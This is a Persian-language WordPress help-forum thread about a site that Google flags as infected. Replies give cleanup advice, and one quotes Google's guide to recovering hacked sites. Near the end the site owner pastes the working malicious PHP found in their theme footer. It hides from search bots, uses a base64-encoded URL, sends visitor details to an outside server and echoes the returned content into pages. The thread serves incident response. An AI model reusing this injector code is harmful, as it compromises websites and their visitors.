• اطلاعیه ها

    • Morteza

      باهم بسازیم: اطلس ووکامرس و وردپرس   14/07/96

      تاپیک ایجاد شده برای بحث در جهت ایجاد یک منبع، ویکی، صفحات توضیحی و یا بخش آموزشی جامع برای وردپرس و متعلقات مختلف آن است. لطفا جهت مشارکت در این بحث، ارائه پیشنهاد و یا انتقاد به تاپیک فوق مراجعه کنید. باهم بسازیم: اطلس ووکامرس و وردپرس
iran

ویروسی شدن سایت

12 پست در این موضوع قرار دارد

سلام

سایت ویروسی شده و گوگل می نویسه ویروسی شده

چیکار کنم

لطفا راهنمایی فرمایید

http://mobilesky.ir

https://www.google.com/search?q=%D9%85%D9%88%D8%A8%D8%A7%DB%8C%D9%84+%D8%A7%D8%B3%DA%A9%D8%A7%DB%8C&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

0

به اشتراک گذاری این پست


لینک به پست

اگر در گوگل آنالیز ثبت نام کردید

بخش پیامها را بررسی کنید

سپس بررسی کد سایت

1

به اشتراک گذاری این پست


لینک به پست

تو وبمستر این چیزا رو نوشته

Cleaning your site

If Google detects that your site has been compromised, we'll tell you about it in Webmaster Tools (to ensure that you're notified quickly, you can have your Message Center messages forwarded to your email account). If the hacker inserted malware into your site, we'll also identify your site as infected in our search results to protect other users.

If your site has been hacked or infected with malware, you should act quickly to repair the damage. Google recommends reviewing the recommendations provided by the organization antiphishing.org.

Whatever your platform or type of infection, Google recommends the following steps:

1: Quarantine your site

It's extremely important that you take action to prevent your site from infecting others and to prevent hackers from further abusing the system.

  • Take your site down immediately. It's extremely important that you take action to prevent your site from infecting others.
  • Contact your web hoster. If the attack affects other sites they host, they may already be taking steps to address the problem.
  • Change the passwords for all users and all accounts (for example, FTP access, administrator account, content management system authoring accounts). Check your users: It's possible that the hacker created one or more new accounts. Password guidelines.

If you have access to your server, Google recommends configuring it to return a 503 status code. Taking your site offline is better than using robots.txt to prevent it from being crawled.

2: Assess the damage

Once you've locked down your site, you'll need to identify the scope and scale of the damage that's been caused. Google recommends the following steps:

  • Visit the Google SafeBrowsing diagnostics page for your site (http://www.google.com/safebrowsing/diagnostic?site=www.example.com) (replace www.example.com with the URL of your own site) to see specific information about what Google's automatic scanners have found.
  • Scan your computer using an up-to-date scanning program to identify any malicious code the hackers might have added. Be sure to scan all your content, not just text-based files, as malicious content can often be embedded in images.
  • If your site has been infected with malware, check the Malware page in Webmaster Tools. (On the site dashboard, click Health and then click Malware.) This page lists sample URLs from your site that have been identified as containing malicious code. Sometimes hackers will add new URLs to your site for their nefarious purposes (for example, phishing).
  • Use the URL Removal tool in Webmaster Tools to request removal of hacked pages or URLs. This will prevent the hacked pages from being served to users.
  • Report phishing pages to the Google Safe Browsing team.
  • Use the Fetch as Google tool in Webmaster Tools to detect malware that might be hidden from the users' browsers, but served to Google's search engine crawler.
  • Review the antiphishing.org recommendations on dealing with hacked sites.
  • If you have other sites, check to see if these have also been hacked.

If you have access to your server, follow these additional steps:

  • Check to see if any open redirects in your site have been exploited.
  • Check your .htaccess file (Apache) or other access control mechanisms depending on your website platform for any malicious changes.
  • Check your server logs to see when files were hacked (bearing in mind that hackers can alter your logs). Look for suspicious activity such as failed sign-in attempts, command history (especially as root), or unknown user accounts.

3: Clean up your site

Clean up your content, removing any pages that were added, any spammy content, and any suspicious code identified by virus scanners or the Malware Details tool. If you have backups of your content, consider deleting your content entirely and replacing it with your last known good backup (once you've checked to make sure it's clean and free of hacked content). You can check whether you've completely cleaned out the hacked content by using the Fetch as Google tool in Webmaster Tools.

If you have access to your server, Google recommends the following steps:

  • Update any software packages to the latest version. Google recommends doing a complete reinstall of your OS from a trusted source to be sure that you've removed everything the hacker may have done. Also make sure to reinstall or update blogging platforms, content management systems, or any other type of third-party software installed.
  • Once you feel confident that your site is clean, change your passwords again.
  • Get your system back online. Change your server's configuration so that it no longer returns a 503 status code and perform any other necessary steps to make your site publicly available.
  • If you used the URL Removal tool to request removal of any URLs that are now clean and ready to appear again in search results, use the same tool to revoke your request.

4: Ask Google to review your site

If your site was infected with malware

Once you're sure that all malicious code has been removed, you can request a malware review of your site. Google will check your site and, if no malware is detected, will remove the warning label that appears in your site's listing on the search results page.

  1. On the Webmaster Tools Home page, select the site you want.
  2. Click Site Status, and then click Malware.
  3. Click Request a review.

Once it's confirmed that your site is clean, it can take up to a day or so for the malware warning to be removed from your site in search results.

If the hackers put spam on your site

Once your site is completely free of spam, you can ask Google to reconsider it for inclusion in search results.

To request reconsideration of your site:

  1. Sign in to Webmaster Tools with your Google Account.
  2. Make sure you have added and verified the site you want reconsidered.
  3. Request reconsideration of your site.

Useful resources

Here are some resources to help clean things up and prevent reinfection of your site.

0

به اشتراک گذاری این پست


لینک به پست

وردپرس را بروزرسانی دستی کنید

فایل wp-config را هم بررسی کنید کد مشکوکی نداشته باشه

قالب را به پیشفرض تغییر دهید

افزونه ها غیر فعال

درخواست بررسی بفرستید

https://www.google.com/webmasters/tools/reconsideration

کد قالب را بررسی کنید

3

به اشتراک گذاری این پست


لینک به پست

من هاست رو اسکن کردم دوتا فایل دانلود زیپ شده بود که تروجان داشت

امکانش هست دلیلش اونا باشن ؟

0

به اشتراک گذاری این پست


لینک به پست

مشکل از فایلهایی که معمولا در وب اجرا میشه هست

2

به اشتراک گذاری این پست


لینک به پست

هیچ کد مشکوکی ندیدم توی هاست جز 2 تا فایل زیپ شده تروجانی که قرنتینه کردمشون

بنظرتون گوگل کی بررسی می کنه ؟

درخواست بررسی هم زدم

0

به اشتراک گذاری این پست


لینک به پست

گوگل وبمستر به کلیه ساب دامین ها هم پیغام زده و نمی ذاره باز بشه

حتی ساب دامین هایی که اصلا به این سرور مربوط نمی شن

0

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

دوستان این کد در فوتر قالبم بود


<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

چیکار کنم که باز اینجوری نشه ؟؟؟

دوستان عزیزی که به مشکل من بر می خورن لطفا افزونه antivirus رو نصب کنید و بزنید اسکن کنه تا مشکلتون رو دقیقا بگه کجاست

ویرایش شده در توسط iran
0

به اشتراک گذاری این پست


لینک به پست

بهترین راه حل گرفتن پرمیژن نوشتن از فایلهای قالب هست

1

به اشتراک گذاری این پست


لینک به پست

اتفاقا پرمیژن وب کانفیگم روی 400 هست بنظرتون پرمیژن قالب هارو تغییر بدم اذیتی نمی کنه توی لود و موارد دیگه ؟

0

به اشتراک گذاری این پست


لینک به پست

خير تغيير سطح دسترسي فايلهاي قالب موردي در اجراشون نداره

حتما اينكار رو بكنيد

1

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری